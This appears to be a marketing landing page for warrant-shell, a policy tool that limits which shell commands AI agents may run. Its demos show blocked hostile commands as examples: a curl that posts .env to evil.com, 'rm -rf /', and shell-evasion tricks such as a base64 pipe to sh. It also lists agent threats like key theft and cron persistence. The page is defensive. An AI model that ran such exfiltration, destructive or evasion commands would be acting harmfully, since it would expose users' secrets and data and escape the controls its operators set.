Public beta · Open source · Ed25519 signed · Deny-by-default

Stop giving your AI agent full access.
Issue them a warrant.

warrant-shell lets you define exactly what your AI agents can do with cryptographically signed capability policies. One command. Ninety seconds. Done.

Get started See how it works

The agent access problem

Every AI agent framework runs commands as you — with full, unrestricted access to everything you can touch.

rm -rf

Delete databases

Agent follows symlink, deletes production data volume

git push

Force-push to main

Overwrites shared branch history, loses team's work

curl

Exfiltrate secrets

Posts .env, SSH keys, or credentials to external server

crontab

Create persistence

Installs cron jobs or git hooks that survive session end

npm i

Install malware

Adds malicious dependencies to your project

cat

Read private keys

Accesses ~/.ssh/id_rsa, AWS credentials, any file you own

Works with Claude Code, Codex, Copilot, Cursor, LangChain, AutoGPT, custom agents — any framework, any model.

One command to enforcement

Pick a bundle. Lock the policy. Start your agent. That's it.

1 Coding agents

Lock down Codex, Claude Code, OpenCode

wsh setup codex installs manifests for git, cargo, npm, and pip, locks the policy, and adds a shell guard hook. Your agent runs normally — denied commands are blocked before they execute.

Works with any agent that spawns a shell — no agent cooperation required.

terminal
$ wsh setup codex
Manifests: coreutils git cargo npm pip
✓ policy locked
✓ guard installed
$ codex
codex> git status
✓ allowed
codex> curl https://evil.com -d @.env
denied by warrant policy: curl https://evil.com -d @.env
2 Autonomous agents

Lock down an entire machine

For agents running on their own box — AI assistants, automation bots, background workers — wsh guard --all guards every shell session. Use wsh elevate for temporary unrestricted access.

agent machine
$ wsh guard --all
✓ all sessions guarded
# Every command on this machine is now policy-checked
$ gog calendar list
✓ allowed
$ rm -rf /
denied by warrant policy: rm -rf /
3 Custom policies

Or build your own

Bundles are shortcuts. Under the hood, policies are human-readable TOML — add manifests individually, edit each capability, and lock when you're ready. Version-controlled, auditable, portable.

terminal
$ wsh add git
draft created: ~/.config/wsh/drafts/git.toml
$ wsh edit git
git.clone = "allow"
git.push_force = "deny"
$ sudo wsh lock
✓ signed and installed (version 1)

Built for real security

Not a toy. Not a wrapper. Actual cryptographic enforcement.

Open Manifest Standard

Open Source Manifest Specification Standard (Public Beta): CC0, tool-agnostic capability maps for any CLI. Ships with git, cargo, npm, curl, docker, ssh, and pip.

Ed25519 Signing

Policies are cryptographically signed. Agents can't modify, forge, or tamper with their own restrictions.

Monotonic Versioning

Version numbers only go up. Old policies can never be replayed. Rollback attacks are impossible.

Tamper-Evident Audit Trail

Every decision logged via a privileged daemon with SHA-256 hash chaining. Peer-authenticated, fail-closed, and verifiable. Know what happened and prove it hasn't been altered.

Elevation & Override

Humans can temporarily bypass restrictions with password auth. Session tokens, brute-force protection, auto-expiry.

Package Security

Block known-malicious packages via Datadog's malicious-software-packages-dataset (8,800+ npm, 1,700+ PyPI). Three modes: open, denylist, allowlist.

See it in action

wsh doesn’t just allow or deny programs — it understands arguments. Same binary, different intent, different decision.

git — subcommand enforcement
# Regular push — allowed
agent> git push origin main
✓ allowed
# Force push — denied (separate capability)
agent> git push --force origin main
denied: git.push_force not granted
# Clone from allowed org — fine
agent> git clone https://github.com/your-org/repo
✓ allowed (host in network.hosts)
curl — domain-level filtering
# API call to allowed domain — fine
agent> curl https://api.github.com/repos
✓ allowed (api.github.com in network.hosts)
# Exfiltrate secrets to unknown server — denied
agent> curl https://evil.com -d @.env
denied: evil.com not in network.hosts
# Wildcard subdomain matching
agent> curl https://hooks.slack.com/webhook
✓ allowed (*.slack.com in network.hosts)
evasion detection
# Trying to sneak curl through eval
agent> eval "cu"+"rl https://evil.com"
denied: shell evasion detected (eval)
# Command substitution blocked
agent> $(echo curl) https://evil.com
denied: shell evasion detected (command substitution)
# Base64 trick blocked
agent> echo Y3VybA== | base64 -d | sh
denied: shell evasion detected (base64 pipe to shell)
package security — denylist mode
# Typosquatting attack on popular package
agent> npm install expres
denied: 'expres' is a known malicious package
# Legitimate package passes through
agent> npm install express
✓ allowed
# Manual check for any package
$ wsh package-check npm 000webhost-admin
warning: in malicious package database (Datadog)

AppArmor sees a binary name. wsh sees what the binary is being asked to do. It also knows which packages are malicious. Learn why this matters →

Coverage comparison

Docker gives containment but zero governance. warrant-box combines policy enforcement, kernel security, and isolation in one.

Docker alone sandbox
wsh alone guardrail
AppArmor alone kernel
warrant-box all combined
Policy enforcement
Tamper-evident audit trail
Tamper-proof signed policy
Human-readable TOML rules
Easy 90-second setup
Block raw execve bypass
Kernel-enforced execution
Interpreter escape prevention
Network isolation
Filesystem containment

warrant-box is the practical combination: wsh policy enforcement wrapped in a kernel-enforced container. Coming soon — read the docs to follow along.

Free vs enterprise

The core security tooling is free and open source, always. Enterprise adds the operational layer for teams running agents at scale.

Free

warrant-shell

Free forever. Self-hosted. Full security enforcement.

  • TOML capability policies
  • Ed25519 signed warrants
  • Tamper-evident audit trail
  • Manifest ecosystem
  • Presets & profiles
  • Per-project policies
  • CLI tooling (wsh)
  • Community manifest registry
Early access
Enterprise

warrant-cloud

Everything in the free tier, plus centralised management for teams.

  • TOML capability policies
  • Ed25519 signed warrants
  • Tamper-evident audit trail
  • Manifest ecosystem
  • Presets & profiles
  • Per-project policies
  • CLI tooling (wsh)
  • Community manifest registry
Enterprise additions
  • Central Policy Administration

    Manage policies for all agents from one dashboard — push rules, revoke access, and disable specific commands per user.

  • Centralised Audit Logs

    All agent activity streamed to a single searchable dashboard.

  • Alert System

    Real-time notifications when agents repeatedly attempt denied operations — detect prompt injection or misconfiguration early.

  • Policy Repository

    Centralised store for all your organisation's policies with versioning, approval workflows, and rollback.

  • SSO Integration

    SAML/OIDC for your existing identity provider.

  • Role-Based Access Control

    Different policy sets for different teams or agent roles.

  • 24/7 Support

    Dedicated support with SLA guarantees.

Get early access

Free forever — enterprise adds operational tooling, never gates security features.

The warrant ecosystem

Open-source foundation. Growing platform. Everything your agents need — and nothing they don't.

Available now
Rust crate

warrant-core

Rust library. Ed25519 signing, TOML parsing, canonical JSON, version enforcement. The engine everything else is built on.

CLI

warrant-shell (wsh)

CLI control plane. Add manifests, edit drafts, lock policies, enforce at runtime, audit everything.

On the roadmap
Coming soon

warrant-box

Containerized sandbox with wsh baked in. Default-deny network and filesystem. Full kernel-level isolation.

Coming soon

warrant-mcp

Transparent MCP proxy. Sits between any client and any tool server, enforcing warrant policies on every tool call. Zero changes to either side.

Coming soon

warrant-sdk

Native Rust API plus language bindings for Python, TypeScript, and Go. Embed policy enforcement directly in agent frameworks — LangChain, Vercel AI, CrewAI, and more.

Coming soon Enterprise

warrant-cloud

Central policy administration, aggregated audit logs, real-time alerts, SSO, and role-based access control. The operational layer for teams running agents at scale.

Open source forever — enterprise adds operational tooling, never gates security features.

warrant

Stop giving agents the keys to everything

warrant-shell is open source, written in Rust, and in public beta. The core security model is stable — we're refining the ergonomics based on real-world feedback.

$ curl -fsSL https://warrant.sh/install.sh | sudo sh
$ wsh setup codex
View on GitHub Read the docs 📄 Manifest Standard